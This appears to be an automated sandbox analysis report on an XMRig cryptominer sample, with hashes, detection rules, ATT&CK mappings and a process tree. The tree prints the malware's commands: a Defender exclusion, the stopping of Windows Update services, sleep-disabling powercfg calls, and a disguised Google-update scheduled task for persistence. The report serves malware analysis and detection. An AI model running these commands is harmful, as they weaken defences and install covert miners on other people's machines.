xmrig | e92585c11ddb24ba5ac4e44c5cffa686e7c22e9d2ccbfb1e115591b70c8bf183

Analysis

max time kernel
296s
max time network
263s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
19/08/2023, 04:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e92585c11ddb24ba5ac4e44c5cffa686e7c22e9d2ccbfb1e115591b70c8bf183.exe
Size

10.0MB
MD5

6bc0f2fb50230e5921a05f2a0413b70c
SHA1

87ba7d23203c95df34e686c512b4966f32e66b8d
SHA256

e92585c11ddb24ba5ac4e44c5cffa686e7c22e9d2ccbfb1e115591b70c8bf183
SHA512

712c43e17c2c91cdc959de5676ec8ad7ef3b1b0b1b2dbbd0012e5ca3dc051dd55998e75d54f2aa130e5b78dfd7ec08ab7440fb865e05261667555d8c57b8c288
SSDEEP

196608:VXjDwSRELA79+vQzTi9sft2sgihpHX4NPdDizsm5W6nTbWS4Afpr:VXjELA74QzTdDPHAPdMfDrpfpr

Score

10^/10

xmrig evasion miner themida

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs

description	pid	Process	procid_target
PID 2840 created 1212	2840	setup.exe	14
PID 2840 created 1212	2840	setup.exe	14
PID 2840 created 1212	2840	setup.exe	14
PID 2840 created 1212	2840	setup.exe	14
PID 2840 created 1212	2840	setup.exe	14
PID 3032 created 1212	3032	updater.exe	14
PID 3032 created 1212	3032	updater.exe	14
PID 3032 created 1212	3032	updater.exe	14
PID 3032 created 1212	3032	updater.exe	14
PID 3032 created 1212	3032	updater.exe	14
PID 3032 created 1212	3032	updater.exe	14

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 23 IoCs

miner

resource	yara_rule
behavioral1/memory/3032-142-0x000000013F3E0000-0x000000014064E000-memory.dmp	xmrig
behavioral1/memory/2152-146-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-148-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-150-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-152-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-154-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-156-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-158-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-160-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-162-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-164-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-166-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-168-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-170-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-172-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-179-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-181-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-183-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-185-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-187-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-189-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-191-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2152-193-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	setup.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 2 IoCs

pid	Process
2840	setup.exe
3032	updater.exe

Loads dropped DLL 2 IoCs

pid	Process
2192	e92585c11ddb24ba5ac4e44c5cffa686e7c22e9d2ccbfb1e115591b70c8bf183.exe
1512	taskeng.exe

Themida packer 28 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000b000000012029-62.dat	themida
behavioral1/memory/2192-61-0x0000000003810000-0x0000000004A7E000-memory.dmp	themida
behavioral1/files/0x000b000000012029-59.dat	themida
behavioral1/files/0x000b000000012029-57.dat	themida
behavioral1/memory/2840-63-0x000000013FDE0000-0x000000014104E000-memory.dmp	themida
behavioral1/memory/2840-65-0x000000013FDE0000-0x000000014104E000-memory.dmp	themida
behavioral1/memory/2840-66-0x000000013FDE0000-0x000000014104E000-memory.dmp	themida
behavioral1/memory/2840-67-0x000000013FDE0000-0x000000014104E000-memory.dmp	themida
behavioral1/memory/2840-68-0x000000013FDE0000-0x000000014104E000-memory.dmp	themida
behavioral1/memory/2840-69-0x000000013FDE0000-0x000000014104E000-memory.dmp	themida
behavioral1/memory/2840-70-0x000000013FDE0000-0x000000014104E000-memory.dmp	themida
behavioral1/memory/2840-72-0x000000013FDE0000-0x000000014104E000-memory.dmp	themida
behavioral1/memory/2840-81-0x000000013FDE0000-0x000000014104E000-memory.dmp	themida
behavioral1/files/0x000b000000012029-101.dat	themida
behavioral1/memory/2840-103-0x000000013FDE0000-0x000000014104E000-memory.dmp	themida
behavioral1/files/0x000a000000015c6c-105.dat	themida
behavioral1/files/0x000a000000015c6c-108.dat	themida
behavioral1/memory/3032-109-0x000000013F3E0000-0x000000014064E000-memory.dmp	themida
behavioral1/memory/3032-111-0x000000013F3E0000-0x000000014064E000-memory.dmp	themida
behavioral1/memory/3032-112-0x000000013F3E0000-0x000000014064E000-memory.dmp	themida
behavioral1/memory/3032-113-0x000000013F3E0000-0x000000014064E000-memory.dmp	themida
behavioral1/memory/3032-114-0x000000013F3E0000-0x000000014064E000-memory.dmp	themida
behavioral1/memory/3032-115-0x000000013F3E0000-0x000000014064E000-memory.dmp	themida
behavioral1/memory/3032-116-0x000000013F3E0000-0x000000014064E000-memory.dmp	themida
behavioral1/memory/3032-117-0x000000013F3E0000-0x000000014064E000-memory.dmp	themida
behavioral1/memory/3032-119-0x000000013F3E0000-0x000000014064E000-memory.dmp	themida
behavioral1/files/0x000a000000015c6c-140.dat	themida
behavioral1/memory/3032-142-0x000000013F3E0000-0x000000014064E000-memory.dmp	themida

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2840	setup.exe
3032	updater.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3032 set thread context of 1608	3032	updater.exe	71
PID 3032 set thread context of 2152	3032	updater.exe	72

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	setup.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2156	sc.exe
2268	sc.exe
1352	sc.exe
1284	sc.exe
2692	sc.exe
2704	sc.exe
1424	sc.exe
2724	sc.exe
2356	sc.exe
1520	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1716	schtasks.exe
1768	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90fb6f8a58d2d901	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2840	setup.exe
2840	setup.exe
2980	powershell.exe
2840	setup.exe
2840	setup.exe
2840	setup.exe
2840	setup.exe
2840	setup.exe
2840	setup.exe
268	powershell.exe
2840	setup.exe
2840	setup.exe
3032	updater.exe
3032	updater.exe
2060	powershell.exe
3032	updater.exe
3032	updater.exe
3032	updater.exe
3032	updater.exe
3032	updater.exe
3032	updater.exe
2492	powershell.exe
3032	updater.exe
3032	updater.exe
3032	updater.exe
3032	updater.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe
2152	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	Process not Found

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeShutdownPrivilege	304	powercfg.exe
Token: SeShutdownPrivilege	2676	powercfg.exe
Token: SeShutdownPrivilege	588	powercfg.exe
Token: SeDebugPrivilege	268	powershell.exe
Token: SeShutdownPrivilege	1988	powercfg.exe
Token: SeDebugPrivilege	2060	powershell.exe
Token: SeShutdownPrivilege	1884	powercfg.exe
Token: SeDebugPrivilege	2492	powershell.exe
Token: SeShutdownPrivilege	2332	powercfg.exe
Token: SeShutdownPrivilege	1052	powercfg.exe
Token: SeShutdownPrivilege	1808	powercfg.exe
Token: SeLockMemoryPrivilege	2152	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2192 wrote to memory of 2840	2192	e92585c11ddb24ba5ac4e44c5cffa686e7c22e9d2ccbfb1e115591b70c8bf183.exe	28
PID 2192 wrote to memory of 2840	2192	e92585c11ddb24ba5ac4e44c5cffa686e7c22e9d2ccbfb1e115591b70c8bf183.exe	28
PID 2192 wrote to memory of 2840	2192	e92585c11ddb24ba5ac4e44c5cffa686e7c22e9d2ccbfb1e115591b70c8bf183.exe	28
PID 2192 wrote to memory of 2840	2192	e92585c11ddb24ba5ac4e44c5cffa686e7c22e9d2ccbfb1e115591b70c8bf183.exe	28
PID 2736 wrote to memory of 2692	2736	cmd.exe	32
PID 2736 wrote to memory of 2692	2736	cmd.exe	32
PID 2736 wrote to memory of 2692	2736	cmd.exe	32
PID 2736 wrote to memory of 2704	2736	cmd.exe	34
PID 2736 wrote to memory of 2704	2736	cmd.exe	34
PID 2736 wrote to memory of 2704	2736	cmd.exe	34
PID 2736 wrote to memory of 2724	2736	cmd.exe	35
PID 2736 wrote to memory of 2724	2736	cmd.exe	35
PID 2736 wrote to memory of 2724	2736	cmd.exe	35
PID 2736 wrote to memory of 2356	2736	cmd.exe	37
PID 2736 wrote to memory of 2356	2736	cmd.exe	37
PID 2736 wrote to memory of 2356	2736	cmd.exe	37
PID 2736 wrote to memory of 1520	2736	cmd.exe	38
PID 2736 wrote to memory of 1520	2736	cmd.exe	38
PID 2736 wrote to memory of 1520	2736	cmd.exe	38
PID 560 wrote to memory of 304	560	cmd.exe	44
PID 560 wrote to memory of 304	560	cmd.exe	44
PID 560 wrote to memory of 304	560	cmd.exe	44
PID 560 wrote to memory of 2676	560	cmd.exe	45
PID 560 wrote to memory of 2676	560	cmd.exe	45
PID 560 wrote to memory of 2676	560	cmd.exe	45
PID 560 wrote to memory of 588	560	cmd.exe	46
PID 560 wrote to memory of 588	560	cmd.exe	46
PID 560 wrote to memory of 588	560	cmd.exe	46
PID 560 wrote to memory of 1988	560	cmd.exe	47
PID 560 wrote to memory of 1988	560	cmd.exe	47
PID 560 wrote to memory of 1988	560	cmd.exe	47
PID 268 wrote to memory of 1716	268	powershell.exe	48
PID 268 wrote to memory of 1716	268	powershell.exe	48
PID 268 wrote to memory of 1716	268	powershell.exe	48
PID 1512 wrote to memory of 3032	1512	taskeng.exe	52
PID 1512 wrote to memory of 3032	1512	taskeng.exe	52
PID 1512 wrote to memory of 3032	1512	taskeng.exe	52
PID 2200 wrote to memory of 1424	2200	cmd.exe	57
PID 2200 wrote to memory of 1424	2200	cmd.exe	57
PID 2200 wrote to memory of 1424	2200	cmd.exe	57
PID 2200 wrote to memory of 2156	2200	cmd.exe	58
PID 2200 wrote to memory of 2156	2200	cmd.exe	58
PID 2200 wrote to memory of 2156	2200	cmd.exe	58
PID 2200 wrote to memory of 2268	2200	cmd.exe	59
PID 2200 wrote to memory of 2268	2200	cmd.exe	59
PID 2200 wrote to memory of 2268	2200	cmd.exe	59
PID 2200 wrote to memory of 1352	2200	cmd.exe	60
PID 2200 wrote to memory of 1352	2200	cmd.exe	60
PID 2200 wrote to memory of 1352	2200	cmd.exe	60
PID 2200 wrote to memory of 1284	2200	cmd.exe	61
PID 2200 wrote to memory of 1284	2200	cmd.exe	61
PID 2200 wrote to memory of 1284	2200	cmd.exe	61
PID 1124 wrote to memory of 1884	1124	cmd.exe	66
PID 1124 wrote to memory of 1884	1124	cmd.exe	66
PID 1124 wrote to memory of 1884	1124	cmd.exe	66
PID 1124 wrote to memory of 2332	1124	cmd.exe	67
PID 1124 wrote to memory of 2332	1124	cmd.exe	67
PID 1124 wrote to memory of 2332	1124	cmd.exe	67
PID 1124 wrote to memory of 1052	1124	cmd.exe	68
PID 1124 wrote to memory of 1052	1124	cmd.exe	68
PID 1124 wrote to memory of 1052	1124	cmd.exe	68
PID 1124 wrote to memory of 1808	1124	cmd.exe	69
PID 1124 wrote to memory of 1808	1124	cmd.exe	69
PID 1124 wrote to memory of 1808	1124	cmd.exe	69

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1212
- C:\Users\Admin\AppData\Local\Temp\e92585c11ddb24ba5ac4e44c5cffa686e7c22e9d2ccbfb1e115591b70c8bf183.exe
  "C:\Users\Admin\AppData\Local\Temp\e92585c11ddb24ba5ac4e44c5cffa686e7c22e9d2ccbfb1e115591b70c8bf183.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2192
- - C:\Windows\Temp\setup.exe
    "C:\Windows\Temp\setup.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    PID:2840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2980
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2736
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2692
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2704
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2724
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2356
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1520
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vdhkybhpl#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:268
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:1716
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:560
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:304
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2676
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:588
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1988
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:2796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2060
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2200
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1424
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2156
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2268
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1352
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1284
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1124
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1884
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2332
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1052
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1808
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vdhkybhpl#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2492
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:1768
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:1608
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2152

C:\Windows\system32\taskeng.exe
taskeng.exe {24EA592B-CFAE-42F2-A048-7CDDA9D6B623} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1512
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  PID:3032

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
9.8MB

MD5
3ea4998b085950234f86951af8629b7f

SHA1
faa4d9aa5b9e5cd963418bddb38d0e4ec1f301b3

SHA256
d4a6bb78b340cda3e2db3edebce1fdba484a310a5d5febd44461d4ef1f9043d1

SHA512
eeb72b0c8c0a14199a7c92e45f54be454b7f23dec93f65925f7254ffbb95bf838b7ea05ba225136cffff1d89ad89ad8e4f509a56d993e444d1e9dc5e36f3d864

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
9.8MB

MD5
3ea4998b085950234f86951af8629b7f

SHA1
faa4d9aa5b9e5cd963418bddb38d0e4ec1f301b3

SHA256
d4a6bb78b340cda3e2db3edebce1fdba484a310a5d5febd44461d4ef1f9043d1

SHA512
eeb72b0c8c0a14199a7c92e45f54be454b7f23dec93f65925f7254ffbb95bf838b7ea05ba225136cffff1d89ad89ad8e4f509a56d993e444d1e9dc5e36f3d864

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
b3ce4be3cb7854f377dad1149c4109cf

SHA1
4cfef552e2b4b06538c63735358b884a2fa21f09

SHA256
506925ba47e83f556247ef1444aed4e30c23b680c246e8d207401a6a6e1365ce

SHA512
b85b80d98c0f3b68d1cba485b931b4048d29f6ac68f2d9b541d8f8b6cc884a425b886ad1bd49a3f68ea0236ab8c0271b0ff4939b7fcf01fc383d7b0558e2f8b5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IHXIS50DFDKEQJP6INKL.temp

Filesize
7KB

MD5
b3ce4be3cb7854f377dad1149c4109cf

SHA1
4cfef552e2b4b06538c63735358b884a2fa21f09

SHA256
506925ba47e83f556247ef1444aed4e30c23b680c246e8d207401a6a6e1365ce

SHA512
b85b80d98c0f3b68d1cba485b931b4048d29f6ac68f2d9b541d8f8b6cc884a425b886ad1bd49a3f68ea0236ab8c0271b0ff4939b7fcf01fc383d7b0558e2f8b5

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
2b19df2da3af86adf584efbddd0d31c0

SHA1
f1738910789e169213611c033d83bc9577373686

SHA256
58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd

SHA512
4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

Download Submit
C:\Windows\Temp\setup.exe

Filesize
9.8MB

MD5
3ea4998b085950234f86951af8629b7f

SHA1
faa4d9aa5b9e5cd963418bddb38d0e4ec1f301b3

SHA256
d4a6bb78b340cda3e2db3edebce1fdba484a310a5d5febd44461d4ef1f9043d1

SHA512
eeb72b0c8c0a14199a7c92e45f54be454b7f23dec93f65925f7254ffbb95bf838b7ea05ba225136cffff1d89ad89ad8e4f509a56d993e444d1e9dc5e36f3d864

Download Submit
C:\Windows\Temp\setup.exe

Filesize
9.8MB

MD5
3ea4998b085950234f86951af8629b7f

SHA1
faa4d9aa5b9e5cd963418bddb38d0e4ec1f301b3

SHA256
d4a6bb78b340cda3e2db3edebce1fdba484a310a5d5febd44461d4ef1f9043d1

SHA512
eeb72b0c8c0a14199a7c92e45f54be454b7f23dec93f65925f7254ffbb95bf838b7ea05ba225136cffff1d89ad89ad8e4f509a56d993e444d1e9dc5e36f3d864

Download Submit
C:\Windows\Temp\setup.exe

Filesize
9.8MB

MD5
3ea4998b085950234f86951af8629b7f

SHA1
faa4d9aa5b9e5cd963418bddb38d0e4ec1f301b3

SHA256
d4a6bb78b340cda3e2db3edebce1fdba484a310a5d5febd44461d4ef1f9043d1

SHA512
eeb72b0c8c0a14199a7c92e45f54be454b7f23dec93f65925f7254ffbb95bf838b7ea05ba225136cffff1d89ad89ad8e4f509a56d993e444d1e9dc5e36f3d864

Download Submit
\Program Files\Google\Chrome\updater.exe

Filesize
9.8MB

MD5
3ea4998b085950234f86951af8629b7f

SHA1
faa4d9aa5b9e5cd963418bddb38d0e4ec1f301b3

SHA256
d4a6bb78b340cda3e2db3edebce1fdba484a310a5d5febd44461d4ef1f9043d1

SHA512
eeb72b0c8c0a14199a7c92e45f54be454b7f23dec93f65925f7254ffbb95bf838b7ea05ba225136cffff1d89ad89ad8e4f509a56d993e444d1e9dc5e36f3d864

Download Submit
\Windows\Temp\setup.exe

Filesize
9.8MB

MD5
3ea4998b085950234f86951af8629b7f

SHA1
faa4d9aa5b9e5cd963418bddb38d0e4ec1f301b3

SHA256
d4a6bb78b340cda3e2db3edebce1fdba484a310a5d5febd44461d4ef1f9043d1

SHA512
eeb72b0c8c0a14199a7c92e45f54be454b7f23dec93f65925f7254ffbb95bf838b7ea05ba225136cffff1d89ad89ad8e4f509a56d993e444d1e9dc5e36f3d864

Download Submit
memory/268-99-0x00000000026E0000-0x0000000002760000-memory.dmp

Filesize
512KB

Download
memory/268-98-0x00000000026E0000-0x0000000002760000-memory.dmp

Filesize
512KB

Download
memory/268-95-0x00000000026E0000-0x0000000002760000-memory.dmp

Filesize
512KB

Download
memory/268-93-0x00000000022D0000-0x00000000022D8000-memory.dmp

Filesize
32KB

Download
memory/268-92-0x000000001B140000-0x000000001B422000-memory.dmp

Filesize
2.9MB

Download
memory/268-94-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp

Filesize
9.6MB

Download
memory/268-97-0x00000000026E0000-0x0000000002760000-memory.dmp

Filesize
512KB

Download
memory/268-96-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp

Filesize
9.6MB

Download
memory/268-100-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp

Filesize
9.6MB

Download
memory/1512-107-0x000000013F3E0000-0x000000014064E000-memory.dmp

Filesize
18.4MB

Download
